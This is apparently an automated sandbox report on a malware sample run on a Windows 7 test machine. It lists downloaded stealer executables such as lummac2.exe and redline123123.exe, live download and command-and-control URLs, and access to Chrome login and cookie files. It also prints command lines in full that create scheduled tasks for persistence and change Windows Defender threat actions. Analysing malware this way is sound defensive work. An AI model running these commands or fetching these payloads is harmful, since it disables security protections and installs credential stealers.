Category | Machine | Started | Completed |
---|---|---|---|
FILE | s1_win7_x6401 | June 15, 2024, 8:20 a.m. | June 15, 2024, 8:23 a.m. |
-
-
-
-
-
judit.exe "C:\Users\test22\AppData\Local\Temp\1000005001\judit.exe"
776 -
-
-
MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
2288
-
-
-
upd.exe "C:\Users\test22\AppData\Local\Temp\1000008001\upd.exe"
2780 -
setup222.exe "C:\Users\test22\AppData\Local\Temp\1000025001\setup222.exe"
800 -
gold.exe "C:\Users\test22\AppData\Local\Temp\1000035001\gold.exe"
2108 -
lummac2.exe "C:\Users\test22\AppData\Local\Temp\1000047001\lummac2.exe"
740 -
onecommander.exe "C:\Users\test22\AppData\Local\Temp\1000060001\onecommander.exe"
2300 -
-
MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
3232
-
-
-
schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN NewKindR.exe /TR "C:\Users\test22\AppData\Local\Temp\1000064001\NewKindR.exe" /F
3540 -
b2c2c1.exe "C:\Users\test22\AppData\Local\Temp\1000304001\b2c2c1.exe"
3656 -
FirstZ.exe "C:\Users\test22\AppData\Local\Temp\1000306001\FirstZ.exe"
3748 -
-
-
-
cmd.exe "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
4020-
forfiles.exe forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
1632 -
forfiles.exe forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"
2240 -
forfiles.exe forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"
2684 -
forfiles.exe forfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"
3372 -
forfiles.exe forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
3696-
-
-
gpupdate.exe "C:\Windows\system32\gpupdate.exe" /force
2792
-
-
-
-
-
-
-
-
-
-
-
-
schtasks.exe schtasks /create /f /RU "test22" /tr "C:\ProgramData\MPGPH131\MPGPH131.exe" /tn "MPGPH131 HR" /sc HOURLY /rl HIGHEST
2704 -
schtasks.exe schtasks /create /f /RU "test22" /tr "C:\ProgramData\MPGPH131\MPGPH131.exe" /tn "MPGPH131 LG" /sc ONLOGON /rl HIGHEST
1152
-
-
-
chrome.exe "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" https://www.youtube.com/account
2808-
chrome.exe "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\test22\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\test22\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\test22\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=65.0.3325.181 --initial-client-data=0x88,0x8c,0x90,0x84,0x94,0x7fef43bf1e8,0x7fef43bf1f8,0x7fef43bf208
2752 -
chrome.exe "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --type=watcher --main-thread-id=2644 --on-initialized-event-handle=316 --parent-handle=320 /prefetch:6
2120
-
-
-
-
-
explorer.exe C:\Windows\Explorer.EXE
1452
IP Address | Status | Action |
---|---|---|
104.26.5.15 | Active | Moloch |
147.45.47.126 | Active | Moloch |
147.45.47.155 | Active | Moloch |
163.172.154.142 | Active | Moloch |
164.124.101.2 | Active | Moloch |
172.67.19.24 | Active | Moloch |
172.67.198.131 | Active | Moloch |
18.244.65.161 | Active | Moloch |
182.162.106.33 | Active | Moloch |
185.172.128.19 | Active | Moloch |
185.215.113.67 | Active | Moloch |
23.41.113.9 | Active | Moloch |
31.31.198.35 | Active | Moloch |
34.117.186.192 | Active | Moloch |
51.15.89.13 | Active | Moloch |
77.91.77.81 | Active | Moloch |
Suricata Alerts
Suricata TLS
Flow | Issuer | Subject | Fingerprint |
---|---|---|---|
TLSv1 192.168.56.101:49188 172.67.198.131:443 |
C=US, O=Let's Encrypt, CN=E5 | CN=boredombusters.online | ae:46:98:37:44:2d:ec:1c:ce:ae:4b:ef:67:3e:b5:93:42:fe:8c:94 |
TLSv1 192.168.56.101:49238 18.244.65.161:443 |
C=US, O=Amazon, CN=Amazon RSA 2048 M01 | CN=*.cloudfront.net | fa:21:45:dc:4d:94:03:a3:09:77:51:78:4a:21:f2:c5:6d:94:be:52 |
TLSv1 192.168.56.101:49269 172.67.198.131:443 |
C=US, O=Let's Encrypt, CN=E5 | CN=boredombusters.online | ae:46:98:37:44:2d:ec:1c:ce:ae:4b:ef:67:3e:b5:93:42:fe:8c:94 |
TLSv1 192.168.56.101:49267 172.67.198.131:443 |
C=US, O=Let's Encrypt, CN=E5 | CN=boredombusters.online | ae:46:98:37:44:2d:ec:1c:ce:ae:4b:ef:67:3e:b5:93:42:fe:8c:94 |
TLS 1.2 192.168.56.101:49271 31.31.198.35:443 |
C=US, O=Let's Encrypt, CN=R11 | CN=kmsandallapp.ru | 26:c0:93:6a:03:1b:96:aa:25:61:71:21:f5:de:ad:77:51:bf:39:19 |
TLS 1.3 192.168.56.101:49276 172.67.19.24:443 |
None | None | None |
TLSv1 192.168.56.101:49279 172.67.198.131:443 |
C=US, O=Let's Encrypt, CN=E5 | CN=boredombusters.online | ae:46:98:37:44:2d:ec:1c:ce:ae:4b:ef:67:3e:b5:93:42:fe:8c:94 |
TLSv1 192.168.56.101:49281 172.67.198.131:443 |
C=US, O=Let's Encrypt, CN=E5 | CN=boredombusters.online | ae:46:98:37:44:2d:ec:1c:ce:ae:4b:ef:67:3e:b5:93:42:fe:8c:94 |
TLSv1 192.168.56.101:49236 172.67.198.131:443 |
None | None | None |
TLSv1 192.168.56.101:49255 172.67.198.131:443 |
C=US, O=Let's Encrypt, CN=E5 | CN=boredombusters.online | ae:46:98:37:44:2d:ec:1c:ce:ae:4b:ef:67:3e:b5:93:42:fe:8c:94 |
TLSv1 192.168.56.101:49266 104.26.5.15:443 |
C=US, O=Google Trust Services LLC, CN=GTS CA 1P5 | CN=db-ip.com | 1f:af:15:cd:f8:f8:ee:30:f9:6e:6e:54:bc:9a:a7:c7:77:70:6d:25 |
TLS 1.3 192.168.56.101:49273 51.15.89.13:10943 |
None | None | None |
TLS 1.3 192.168.56.101:49278 163.172.154.142:14433 |
None | None | None |
TLSv1 192.168.56.101:49280 172.67.198.131:443 |
None | None | None |
registry | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\MachineGuid |
file | C:\Program Files (x86)\Google\Chrome\Application\chrome.exe |
file | C:\Program Files\Mozilla Firefox\firefox.exe |
registry | HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Google Chrome |
registry | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\chrome.exe\PATH |
section | \x00 |
section | .idata |
section | |
section | gznyyhbr |
section | jufnpfbp |
section | .taggant |
suspicious_features | POST method with no referer header, POST method with no useragent header, Connection to IP address | suspicious_request | POST http://147.45.47.155/ku4Nor9/index.php | ||||||
suspicious_features | GET method with no useragent header, Connection to IP address | suspicious_request | GET http://77.91.77.81/cost/sarra.exe | ||||||
suspicious_features | GET method with no useragent header, Connection to IP address | suspicious_request | GET http://77.91.77.81/soka/random.exe | ||||||
suspicious_features | GET method with no useragent header, Connection to IP address | suspicious_request | GET http://77.91.77.81/cost/random.exe | ||||||
suspicious_features | GET method with no useragent header, Connection to IP address | suspicious_request | GET http://77.91.77.81/well/random.exe | ||||||
suspicious_features | POST method with no referer header, POST method with no useragent header, Connection to IP address | suspicious_request | POST http://77.91.77.81/Kiru9gu/index.php | ||||||
suspicious_features | GET method with no useragent header, Connection to IP address | suspicious_request | GET http://77.91.77.81/lend/judit.exe | ||||||
suspicious_features | GET method with no useragent header, Connection to IP address | suspicious_request | GET http://77.91.77.81/lend/redline123123.exe | ||||||
suspicious_features | GET method with no useragent header, Connection to IP address | suspicious_request | GET http://77.91.77.81/lend/upd.exe | ||||||
suspicious_features | GET method with no useragent header, Connection to IP address | suspicious_request | GET http://77.91.77.81/lend/setup222.exe | ||||||
suspicious_features | GET method with no useragent header, Connection to IP address | suspicious_request | GET http://77.91.77.81/lend/gold.exe | ||||||
suspicious_features | GET method with no useragent header, Connection to IP address | suspicious_request | GET http://77.91.77.81/lend/lummac2.exe | ||||||
suspicious_features | GET method with no useragent header, Connection to IP address | suspicious_request | GET http://77.91.77.81/lend/onecommander.exe | ||||||
suspicious_features | GET method with no useragent header, Connection to IP address | suspicious_request | GET http://77.91.77.81/lend/drivermanager.exe | ||||||
suspicious_features | GET method with no useragent header, Connection to IP address | suspicious_request | GET http://185.172.128.19/NewKindR.exe | ||||||
suspicious_features | POST method with no referer header, POST method with no useragent header, Connection to IP address | suspicious_request | POST http://185.172.128.19/ghsdh39s/index.php | ||||||
suspicious_features | GET method with no useragent header, Connection to IP address | suspicious_request | GET http://77.91.77.81/lend/servoces64.exe | ||||||
suspicious_features | GET method with no useragent header, Connection to IP address | suspicious_request | GET http://185.172.128.19/b2c2c1.exe | ||||||
suspicious_features | GET method with no useragent header, Connection to IP address | suspicious_request | GET http://185.172.128.19/FirstZ.exe | ||||||
suspicious_features | GET method with no useragent header | suspicious_request | GET https://d1i94yju6i4l9g.cloudfront.net/setup.exe | ||||||
suspicious_features | GET method with no useragent header | suspicious_request | GET https://kmsandallapp.ru/Gibson.exe |
request | POST http://147.45.47.155/ku4Nor9/index.php |
request | GET http://77.91.77.81/cost/sarra.exe |
request | GET http://77.91.77.81/soka/random.exe |
request | GET http://77.91.77.81/cost/random.exe |
request | GET http://77.91.77.81/well/random.exe |
request | POST http://77.91.77.81/Kiru9gu/index.php |
request | GET http://77.91.77.81/lend/judit.exe |
request | GET http://77.91.77.81/lend/redline123123.exe |
request | GET http://77.91.77.81/lend/upd.exe |
request | GET http://77.91.77.81/lend/setup222.exe |
request | GET http://77.91.77.81/lend/gold.exe |
request | GET http://77.91.77.81/lend/lummac2.exe |
request | GET http://77.91.77.81/lend/onecommander.exe |
request | GET http://77.91.77.81/lend/drivermanager.exe |
request | GET http://apps.identrust.com/roots/dstrootcax3.p7c |
request | GET http://185.172.128.19/NewKindR.exe |
request | POST http://185.172.128.19/ghsdh39s/index.php |
request | GET http://77.91.77.81/lend/servoces64.exe |
request | GET http://185.172.128.19/b2c2c1.exe |
request | GET http://185.172.128.19/FirstZ.exe |
request | GET http://x1.i.lencr.org/ |
request | GET https://d1i94yju6i4l9g.cloudfront.net/setup.exe |
request | GET https://db-ip.com/demo/home.php?s=175.208.134.152 |
request | GET https://kmsandallapp.ru/Gibson.exe |
request | POST http://147.45.47.155/ku4Nor9/index.php |
request | POST http://77.91.77.81/Kiru9gu/index.php |
request | POST http://185.172.128.19/ghsdh39s/index.php |
domain | kmsandallapp.ru | description | Russian Federation domain TLD |
description | axplong.exe tried to sleep 1067 seconds, actually delayed analysis time by 1067 seconds | |||
description | a2772ea559.exe tried to sleep 320 seconds, actually delayed analysis time by 320 seconds | |||
description | explortu.exe tried to sleep 1136 seconds, actually delayed analysis time by 1136 seconds |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Web Data |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Extension Cookies |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\lockfile |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\CrashpadMetrics-spare.pma |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Login Data |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\Safe Browsing Bloom Prefix Set |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\Safe Browsing IP Blacklist |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\BrowserMetrics |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\ShaderCache\GPUCache |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\CrashpadMetrics.pma |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\Safe Browsing Module Whitelist |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\Safe Browsing\ChromeFilenameClientIncident.store |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\Safe Browsing Side-Effect Free Whitelist |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\Safe Browsing UwS List Prefix Set |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\Crashpad\settings.dat |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\Safe Browsing Inclusion Whitelist |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\Safe Browsing Csd Whitelist |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\CrashpadMetrics-active.pma |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\Local State |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\BrowserMetrics\BrowserMetrics-666D1B6A-AF8.pma |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\BrowserMetrics-active.pma |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\Safe Browsing Extension Blacklist |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\BrowserMetrics-spare.pma |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\Crashpad |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\Safe Browsing Resource Blacklist |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Cookies |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\First Run |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\Crashpad\reports |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\Safe Browsing Download Whitelist |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\Safe Browsing Download |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\ShaderCache\GPUCache\data_0 |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\Safe Browsing\AnyIpMalware.store |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\Safe Browsing UwS List |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\Safe Browsing Bloom |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\Crashpad\metadata |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\ShaderCache\GPUCache\index |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\ShaderCache\GPUCache\data_1 |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\ShaderCache\GPUCache\data_2 |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\ShaderCache\GPUCache\data_3 |
domain | ipinfo.io |
file | C:\Users\test22\AppData\Local\Temp\onefile_776_133629000743281250\stub.exe |
file | C:\Users\test22\AppData\Local\Temp\onefile_776_133629000743281250\libcrypto-1_1.dll |
file | C:\Users\test22\AppData\Local\Temp\onefile_776_133629000743281250\libssl-1_1.dll |
file | C:\Users\test22\AppData\Local\Temp\1000304001\b2c2c1.exe |
file | C:\Users\test22\AppData\Local\Temp\1000035001\gold.exe |
file | C:\Users\test22\AppData\Local\Temp\1000064001\NewKindR.exe |
file | C:\Users\test22\AppData\Local\Temp\onefile_776_133629000743281250\libffi-7.dll |
file | C:\Users\test22\AppData\Local\Temp\1000025001\setup222.exe |
file | C:\Users\test22\AppData\Local\Temp\SetupWizard.exe |
file | C:\Users\test22\AppData\Local\Temp\1000307001\setup.exe |
file | C:\Users\test22\AppData\Local\Temp\onefile_776_133629000743281250\python310.dll |
file | C:\Users\test22\1000015002\d7e4153d35.exe |
file | C:\Users\test22\AppData\Local\Temp\onefile_776_133629000743281250\python3.dll |
file | C:\Users\test22\AppData\Local\Temp\1000306001\FirstZ.exe |
file | C:\Users\test22\AppData\Local\Temp\7zSB243.tmp\Install.exe |
file | C:\Users\test22\AppData\Local\Temp\7zSB4F3.tmp\Install.exe |
file | C:\Users\test22\AppData\Local\Temp\12.exe |
file | C:\Users\test22\AppData\Local\Temp\1000008001\upd.exe |
file | C:\Users\test22\AppData\Local\Temp\1000047001\lummac2.exe |
file | C:\Users\test22\AppData\Local\Temp\1000005001\judit.exe |
file | C:\Users\test22\AppData\Local\Temp\1000017001\db324166b9.exe |
file | C:\Users\test22\AppData\Local\Temp\onefile_776_133629000743281250\vcruntime140.dll |
file | C:\Users\test22\AppData\Local\Temp\1000016001\a2772ea559.exe |
file | C:\Users\test22\AppData\Local\Temp\1000063001\drivermanager.exe |
file | C:\Users\test22\AppData\Local\Temp\1000007001\redline123123.exe |
file | C:\Users\test22\AppData\Local\Temp\1000060001\onecommander.exe |
file | C:\Users\test22\AppData\Local\Temp\onefile_776_133629000743281250\sqlite3.dll |
file | C:\Users\test22\AppData\Local\Temp\1000068001\servoces64.exe |
file | C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk |
cmdline | powershell start-process -WindowStyle Hidden gpupdate.exe /force |
cmdline | "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force" |
cmdline | SCHTASKS /Create /SC MINUTE /MO 1 /TN NewKindR.exe /TR "C:\Users\test22\AppData\Local\Temp\1000064001\NewKindR.exe" /F |
cmdline | forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force" |
cmdline | schtasks /create /f /RU "test22" /tr "C:\ProgramData\MPGPH131\MPGPH131.exe" /tn "MPGPH131 HR" /sc HOURLY /rl HIGHEST |
cmdline | cmd /C forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force" |
cmdline | schtasks /create /f /RU "test22" /tr "C:\ProgramData\MPGPH131\MPGPH131.exe" /tn "MPGPH131 LG" /sc ONLOGON /rl HIGHEST |
cmdline | forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" |
cmdline | "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN NewKindR.exe /TR "C:\Users\test22\AppData\Local\Temp\1000064001\NewKindR.exe" /F |
cmdline | /C powershell start-process -WindowStyle Hidden gpupdate.exe /force |
file | C:\Users\test22\AppData\Local\Temp\9217037dc9\explortu.exe |
file | C:\Users\test22\AppData\Local\Temp\1000016001\a2772ea559.exe |
file | C:\Users\test22\AppData\Local\Temp\1000017001\db324166b9.exe |
file | C:\Users\test22\AppData\Local\Temp\8254624243\axplong.exe |
file | C:\Users\test22\AppData\Local\Temp\1000005001\judit.exe |
file | C:\Users\test22\AppData\Local\Temp\1000007001\redline123123.exe |
file | C:\Users\test22\AppData\Local\Temp\1000008001\upd.exe |
file | C:\Users\test22\AppData\Local\Temp\1000025001\setup222.exe |
file | C:\Users\test22\AppData\Local\Temp\1000035001\gold.exe |
file | C:\Users\test22\AppData\Local\Temp\1000047001\lummac2.exe |
file | C:\Users\test22\AppData\Local\Temp\1000060001\onecommander.exe |
file | C:\Users\test22\AppData\Local\Temp\1000064001\NewKindR.exe |
file | C:\Users\test22\AppData\Local\Temp\1000068001\servoces64.exe |
file | C:\Users\test22\AppData\Local\Temp\onefile_776_133629000743281250\stub.exe |
file | C:\Users\test22\AppData\Local\Temp\12.exe |
file | C:\Users\test22\AppData\Local\Temp\1000304001\b2c2c1.exe |
file | C:\Users\test22\AppData\Local\Temp\1000306001\FirstZ.exe |
file | C:\Users\test22\AppData\Local\Temp\1000307001\setup.exe |
file | C:\Users\test22\AppData\Local\Temp\1000008001\upd.exe |
file | C:\Users\test22\AppData\Local\Temp\1000064001\NewKindR.exe |
file | C:\Users\test22\AppData\Local\Temp\9217037dc9\explortu.exe |
file | C:\Users\test22\AppData\Local\Temp\1000016001\a2772ea559.exe |
file | C:\Users\test22\AppData\Local\Temp\1000307001\setup.exe |
file | C:\Users\test22\AppData\Local\Temp\1000035001\gold.exe |
file | C:\Users\test22\AppData\Local\Temp\12.exe |
file | C:\Users\test22\AppData\Local\Temp\1000007001\redline123123.exe |
file | C:\Users\test22\AppData\Local\Temp\8254624243\axplong.exe |
file | C:\Users\test22\AppData\Local\Temp\1000047001\lummac2.exe |
file | C:\Users\test22\AppData\Local\Temp\1000304001\b2c2c1.exe |
file | C:\Users\test22\AppData\Local\Temp\1000017001\db324166b9.exe |
wmi | <INVALID POINTER> |